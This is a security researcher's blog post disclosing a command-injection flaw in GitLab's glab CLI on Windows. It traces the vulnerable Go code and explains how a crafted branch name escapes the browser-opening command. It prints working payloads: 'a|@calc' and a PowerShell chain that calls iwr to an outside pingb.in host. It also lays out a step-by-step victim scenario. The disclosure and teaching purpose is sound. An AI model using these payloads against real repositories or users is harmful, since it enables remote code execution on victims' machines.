---
layout: post
title: RCE in GitLab's CLI tool
date: '2023-07-06T06:42:00.016-07:00'
author: t4kemyh4nd
tags: 
modified_time: '2023-07-06T07:19:34.177-07:00'
thumbnail: https://gitlab.com/uploads/-/system/group/avatar/3786502/gitlab-security-icon-rgb.png
blogger_id: tag:blogger.com,1999:blog-6833997159700243932.post-2076374714493149386
blogger_orig_url: http://blog.takemyhand.xyz/2023/07/remote-code-execution-in-gitlabs-cli.html
---

<div id="html" markdown="0">
<h1 id="description">Introduction<br /></h1>
<p>After starting at GitLab in October last year as a security engineer, one of the first reviews that came my way was our CLI tool, which was only recently published officially. <br /></p><p>Taking inspiration from the <a href="https://snyk.io/blog/command-injection-vulnerability-cve-2022-40764/">command injection vulnerability in Snyk's CLI tool</a>, we decided to performed a code review on <a href="https://gitlab.com/gitlab-org/cli">GitLab's CLI tool</a> to look for improper usage of <code><b>exec.Command</b></code>.  A particular code snippet in <b><code>/pkg/browser/browser.go</code>:</b></p>
<pre><code class="lang-go">func ForOS(goos, url <span class="hljs-built_in">string</span>) *exec.Cmd {
<span class="hljs-keyword"><span>&nbsp;&nbsp; &nbsp;</span>exe</span> := <span class="hljs-string">"open"</span>
<span>&nbsp;&nbsp; &nbsp;</span>var <span class="hljs-keyword">args</span> []<span class="hljs-built_in">string</span>
<span>&nbsp;&nbsp; &nbsp;</span>switch goos {
<span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span>case <span class="hljs-string">"darwin"</span>:
<span class="hljs-keyword"><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span>args</span> = <span class="hljs-keyword">append</span>(<span class="hljs-keyword">args</span>, url)
<span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span>case <span class="hljs-string">"windows"</span>:
<span class="hljs-keyword"><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span>exe</span> = <span class="hljs-string">"cmd"</span>
<span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span>r := strings.NewReplacer(<span class="hljs-string">"&amp;amp;"</span>, <span class="hljs-string">"^&amp;amp;"</span>)
<span class="hljs-keyword"><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span>args</span> = <span class="hljs-keyword">append</span>(<span class="hljs-keyword">args</span>, <span class="hljs-string">"/c"</span>, <span class="hljs-string">"start"</span>, r.Replace(url))
<span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span>defaul<span class="hljs-variable">t:</span>
<span class="hljs-keyword"><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span>exe</span> = <span class="hljs-string">"xdg-open"</span>
<span class="hljs-keyword"><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span><span>&nbsp;&nbsp; &nbsp;</span>args</span> = <span class="hljs-keyword">append</span>(<span class="hljs-keyword">args</span>, url)
}

cmd := exec.Command(<span class="hljs-keyword">exe</span>, <span class="hljs-keyword">args</span>...)&nbsp;</code></pre><h1 id="description">Attack surface<br /></h1>
<p>Golang does a pretty decent job of protecting against command injection, and we would only be vulnerable to any kind of RCE only if direct calls to <code>cmd.exe</code> or <code>sh</code> were being made with user input. In the above code snippet, <code>url</code> is directly being used to call a command that looks like:
<code><b>cmd.exe /c "start &lt;http://url=""&gt;</b></code></p>
<p>If we can control the <code>url</code> parameter somehow, we may be able to break out of the URL and inject arbitrary commands. Looking for usage of this function leads us to <code><b>/commands/mr/create/mr_create.go</b></code>. <a href="https://gitlab.com/gitlab-org/cli/-/blob/main/commands/mr/create/mr_create.go#L716">This line</a> indirectly calls the function that we have noted above:</p>
<pre><code class="lang-go"><span class="hljs-keyword">return</span> utils.OpenInBrowser(openURL, browser)
</code></pre>
<p><code><b>openURL</b></code> is generated using <a href="https://gitlab.com/gitlab-org/cli/-/blob/main/commands/mr/create/mr_create.go#L707">the following</a>:</p>
<pre><code class="lang-go">openURL, err := generateMRCompareURL(opts)
</code></pre>
<p>Following <b><code>generateMRCompareURL</code></b> leads us to the following <a href="https://gitlab.com/gitlab-org/cli/-/blob/main/commands/mr/create/mr_create.go#L742">piece of code</a>:</p>
<pre><code class="lang-go">u, err := url.Parse(opts<span class="hljs-selector-class">.SourceProject</span><span class="hljs-selector-class">.WebURL</span>)</code></pre><pre><code class="lang-go">&nbsp;<span class="hljs-keyword">if</span> err != nil {
<span>&nbsp;&nbsp; &nbsp;</span>return <span class="hljs-string">""</span>, err
}</code></pre><pre><code class="lang-go">u<span class="hljs-selector-class">.Path</span> += <span class="hljs-string">"/-/merge_requests/new"</span>
u<span class="hljs-selector-class">.RawQuery</span> = fmt.Sprintf( <span class="hljs-string">"merge_request[title]=%s&amp;amp;merge_request[description]=%s&amp;amp;merge_request[source_branch]=%s&amp;amp;merge_request[target_branch]=%s&amp;amp;merge_request[source_project_id]=%d&amp;amp;merge_request[target_project_id]=%d"</span>,
strings.ReplaceAll(url.PathEscape(opts.Title), <span class="hljs-string">"+"</span>, <span class="hljs-string">"%2B"</span>),
strings.ReplaceAll(url.PathEscape(description), <span class="hljs-string">"+"</span>, <span class="hljs-string">"%2B"</span>),
opts<span class="hljs-selector-class">.SourceBranch</span>,
opts<span class="hljs-selector-class">.TargetBranch</span>,
opts<span class="hljs-selector-class">.SourceProject</span><span class="hljs-selector-class">.ID</span>,
opts<span class="hljs-selector-class">.TargetProject</span><span class="hljs-selector-class">.ID</span>)
return u.String(), nil
</code></pre>
<p>Circling back to what we already covered, if a user supplies the following input:<br />
<code>glab mr create --web</code>,<br />the function <code><b>previewMR()</b></code> generates a URL via <code><b>generateMRCompareURL()</b></code>, and due to supplying the <b><code>--web</code></b> flag, <code><b>utils.OpenInBrowser(openURL, browser)</b></code> ends up calling (pay close attention to the <b>&amp;</b> char being escaped via the <b>^</b> char, which is done to send the <b>&amp;</b> as a URL parameter separator instead of a shell character)<br /><code>cmd.exe /c "start https://gitlab.com/test-user/test-repo/-/merge_requests/new?merge_request[title]=%s^&amp;amp;merge_request[description]=%s^&amp;amp;merge_request[source_branch]=%s^&amp;amp;merge_request[target_branch]=%s^&amp;amp;merge_request[source_project_id]=%d^&amp;amp;merge_request[target_project_id]=%d"</code><br /></p>
<p>Looking at <code><b>generateCompareURL()</b></code> to see what parameters we can control:</p>
<pre><code class="lang-go">u<span class="hljs-selector-class">.RawQuery</span> = fmt.Sprintf( <span class="hljs-string">"merge_request[title]=%s&amp;amp;merge_request[description]=%s&amp;amp;merge_request[source_branch]=%s&amp;amp;merge_request[target_branch]=%s&amp;amp;merge_request[source_project_id]=%d&amp;amp;merge_request[target_project_id]=%d"</span>,
strings.ReplaceAll(url.PathEscape(opts.Title), <span class="hljs-string">"+"</span>, <span class="hljs-string">"%2B"</span>),
strings.ReplaceAll(url.PathEscape(description), <span class="hljs-string">"+"</span>, <span class="hljs-string">"%2B"</span>),
opts<span class="hljs-selector-class">.SourceBranch</span>,
opts<span class="hljs-selector-class">.TargetBranch</span>,
opts<span class="hljs-selector-class">.SourceProject</span><span class="hljs-selector-class">.ID</span>,
opts<span class="hljs-selector-class">.TargetProject</span><span class="hljs-selector-class">.ID</span>)
return u.String(), nil
</code></pre>
<p>The <b>title</b> and the <b>description</b> is set by the user calling the <b><code>glab mr create --web</code></b> command. We could try poisoning either the <b>source branch name</b> or the <b>target branch name</b>.&nbsp; <br /></p><h1 id="description">Exploitation</h1><p>So, we are at a stage where we need to craft a valid git branch whose name is such that it allows us to break out of the URL and inject arbitrary commands. </p><p>Our current injection point, which is the URL parameter <b>merge_request[target_branch]</b> looks like the following<br /></p><p><code>cmd.exe /c "start https://gitlab.com/test-user/test-repo/-/merge_requests/new?merge_request[title]=%s^&amp;amp;merge_request[description]=%s^&amp;amp;merge_request[source_branch]=%s^&amp;amp;merge_request[target_branch]=<b>PAYLOAD-HERE</b>^&amp;amp;merge_request[source_project_id]=%d^&amp;amp;merge_request[target_project_id]=%d"</code><br /></p>
<p>The simplest way to break out of the command would be to use something like <b>&amp;calc.exe</b>, which could end up calling<br /><code>cmd.exe /c "start https://gitlab.com/test-user/test-repo/-/merge_requests/new?merge_request[target_branch]=<b>&amp;calc.exe</b>"</code><br /> As a result, the <code>start</code> command would first open the URL <code>https://gitlab.com/test-user/test-repo/-/merge_requests/new?merge_request[target_branch]=</code>, and Windows will then run the <code>calc.exe</code> process, thanks to the <b>&amp;</b> shell character.</p>
<p>However, all <b>&amp;</b> chars are escaped using the following line:</p>
<pre><code class="lang-go">r := strings.NewReplacer(<span class="hljs-string">"&amp;amp;"</span>, <span class="hljs-string">"^&amp;amp;"</span>)
</code></pre>
<p>So, <b>&amp;</b> is not an option.</p>
<p>Windows has many file name restrictions, which wouldn't allow you to create a proper payload. However, <b>this was not the case when creating a branch name within the GitLab UI itself</b>. After a lot of fuzzing and searching online, the following branch name was finally crafted by using the "@" and "|" character: <code>a|@calc</code>. Yes, these are valid command delimiters in Windows commands, and more importantly, <b>valid branch names</b> that cannot be created locally, but only via the GitLab UI. This leads to RCE.</p><p>&nbsp;</p><p>What's more useful as an attacker is the ability to set default branches in your projects in GitLab, which mean that by default, all Git clients will load and refer to this branch. <br /></p>
<h2 id="attack-scenario">Attack scenario</h2>
<ol>
<li>Attacker creates a repository. They create a branch named "@|calc".</li>
<li>To make the attack more convincing, they set this branch as the default branch.</li>
<li>Victim clones the repository on their machine.</li>
<li>Victim tries to create an MR using <code>glab mr create --web</code></li>
<li>The following command is run: <code>cmd.exe /c "start https://gitlab.com/test-user/test-repo/-/merge_requests/new?merge_request[title]=%s^&amp;amp;merge_request[description]=%s^&amp;amp;merge_request[source_branch]=%s^&amp;amp;merge_request[target_branch]=<b>@|calc</b>^&amp;amp;merge_request[source_project_id]=%d^&amp;amp;merge_request[target_project_id]=%d"</code>.</li>
<li>The pipe character allows to break out of the URL context and launch <code>calc</code>.</li>
</ol>
<h2 id="poc-video">PoC video</h2>
<iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/9oMPKs2mom8" title="YouTube video player" width="560"></iframe><h1 id="current-limitations">Further limitations<br /></h1><div style="text-align: left;">After trying to craft a more practical payload that would do more than just pop calc, I came across the following restrictions<br /></div>
<ol>
<li>Can't use the space character for a more complex payload</li>
<li>Length limit due to branch name specifications</li>
</ol>
<p>After further fuzzing, I found out that we can fully chain arbitrary Windows commands using the ";" command delimiter. The branch name for this exploitation would be:</p><p>&nbsp;<code>a|@powershell;iwr('pingb.in/p/1df28a9c513ab75e6a3c73d52b8f')</code></p><div style="text-align: left;"><p>This will first open up Powershell, then run the commands following the ';' character inside it. This is also something I wasn't aware of before.<br /></p><h1 id="current-limitations">Conclusion</h1><div id="current-limitations" style="text-align: left;">People often discount CLI tools when it comes to finding impactful security issues, but it shouldn't be forgotten that as long as there are venues that process user input, especially using sensitive sinks that deal with shell commands, local filesystem operations etc., there is always a chance that things might go wrong - so be sure to thoroughly analyze the different functionalities of such tools.<br /></div><h2 style="text-align: left;"></h2><code>&nbsp; </code></div>
</div>